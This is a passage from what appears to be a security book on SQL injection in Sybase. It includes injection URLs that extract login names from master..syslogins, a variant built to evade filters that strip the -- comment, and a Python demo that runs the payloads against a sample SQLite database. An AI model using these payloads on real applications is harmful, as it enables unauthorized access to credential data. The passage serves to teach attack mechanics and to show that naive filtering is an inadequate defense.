MS SQL Server Injection Techniques in Sybase

A lot of papers have been published on SQL injection in Microsoft SQL Server applications, and because Sybase and MS SQL Server have a common heritage, it is worthwhile to take a quick survey of the known techniques and see how well they work in Sybase.

Comments

Sybase supports the -- and /* ... */ comment styles in exactly the same manner as MS SQL Server, so you can truncate the remainder of a query with the -- sequence in the same way. It is unwise to rely on -- too heavily, however, because it is almost always possible to complete the query in a manner that makes the comment sequence unnecessary, which is exactly what you need when an application filters or rejects the -- sequence. For example, in the preceding UNION SELECT example,

http://sybase.example.com/servlet/BookQuery?search=1234')+union+select+name,null,null,null,null,null,null,null,null,0+from+master..syslogins--

we could just conclude the query with an unnecessary “or” term:

http://sybase.example.com/servlet/BookQuery?search=1234')+union+select+name,null,null,null,null,null,null,null,null,0+from+master..syslogins+where+1=1+or+('a'='a

The trailing ('a'='a supplies the opening parenthesis and quote that the application's own closing ') then completes, so the entire query is syntactically correct without any comment sequence at all. In general, a superfluous "or" term in the where clause will do this, or (if you're injecting a batch of statements) an additional "select" at the end of the batch that the remainder of the original query can complete.

Union Select

As you have just seen, “union select” statements work in almost exactly the same way.
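The two injections from the Comments section, and the union select they carry, run against a small in-memory SQLite database that stands in for the Sybase server. This is an added example, not code from the book or from the BookQuery servlet it describes: the schema, the three-column layout (in place of the ten columns in the URLs above), the local syslogins table standing in for master..syslogins, and the strip_comment_sequence "fix" are all constructed for illustration, and SQLite is used only because it shares the -- comment and union select syntax the passage relies on. The point it shows is the one the text makes: a filter that merely strips -- kills the first payload, while the payload that closes the query with an "or" term is untouched by it.

```python
import sqlite3

# Constructed sample schema: a 'books' table for the hypothetical BookQuery
# servlet and a local 'syslogins' table standing in for master..syslogins.
SCHEMA = """
CREATE TABLE books (isbn TEXT, title TEXT, price INTEGER);
INSERT INTO books VALUES ('1234', 'Database Hacking', 40);
INSERT INTO books VALUES ('5678', 'Network Security', 35);
CREATE TABLE syslogins (name TEXT);
INSERT INTO syslogins VALUES ('sa');
INSERT INTO syslogins VALUES ('probe');
"""

# The two injected search terms, reduced to three columns. The first ends
# with the -- comment; the second ends with the superfluous "or" term whose
# opening ( and ' are completed by the application's own closing ').
PAYLOAD_COMMENT = "1234') union select name,null,0 from syslogins--"
PAYLOAD_OR_TERM = "1234') union select name,null,0 from syslogins where 1=1 or ('a'='a"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def book_query(conn, search):
    """The vulnerable query: the search term is pasted straight into the SQL.
    Returns the result rows sorted by first column, or None if the server
    rejects the statement (the 'error' case the attacker is trying to avoid)."""
    sql = "SELECT title, price, 0 FROM books WHERE (isbn = '%s')" % search
    try:
        return sorted(conn.execute(sql).fetchall(), key=lambda row: row[0])
    except sqlite3.OperationalError:
        return None


def strip_comment_sequence(search):
    """A naive, hypothetical 'fix' that removes the -- sequence and nothing else."""
    return search.replace("--", "")


def run_demo():
    """Run both payloads with and without the comment-stripping filter."""
    conn = open_db()
    results = {
        "comment": book_query(conn, PAYLOAD_COMMENT),
        "or_term": book_query(conn, PAYLOAD_OR_TERM),
        "comment_filtered": book_query(conn, strip_comment_sequence(PAYLOAD_COMMENT)),
        "or_term_filtered": book_query(conn, strip_comment_sequence(PAYLOAD_OR_TERM)),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(name, rows)
```

Both unfiltered payloads return the legitimate book row plus every login name from the union; once -- is stripped, the comment payload leaves a dangling ') and fails to parse, while the "or" payload still returns the login names.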

Error Messages

Sybase error messages are almost as helpful as MS SQL Server error messages. Specifically, the “integer conversion” trick works identically. ...
